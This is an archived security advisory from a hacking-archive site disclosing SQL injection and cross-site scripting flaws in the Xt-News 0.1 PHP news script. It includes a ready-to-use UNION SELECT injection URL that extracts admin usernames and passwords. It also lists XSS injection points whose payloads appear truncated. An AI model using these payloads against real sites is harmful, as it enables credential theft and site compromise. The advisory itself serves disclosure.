AOH :: HP Unsorted X :: C07-1457.HTM

Xt-News 0.1 : SQL Injection Vulnerability & XSS



Xt-News 0.1 : SQL Injection Vulnerability & XSS
Xt-News 0.1 : SQL Injection Vulnerability & XSS



Xt-News 0.1
-----------
Vendor site: http://dreaxteam.free.fr/forums/ 
Product: Xt-News 0.1
Vulnerability: SQL Injection Vulnerability & XSS
Credits: Mr_KaLiMaN
Reported to Vendor: 10/12/06
Public disclosure: 22/12/06
 
Description:
------------
SQL Injection Vulnerability:
http://[victim]/[script_news_path]/show_news.php?id_news=[SQL INJECTION] 
http://[victim]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1# 


XSS:
http://[victim]/[script_news_path]/add_comment.php?id_news=[XSS] 
http://[victim]/[script_news_path]/add_comment.php?id_news="> " 
http://[victim]/[script_news_path]/show_news.php?id_news=[XSS] 
http://[victim]/[script_news_path]/show_news.php?id_news='> ' 


-------------------

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.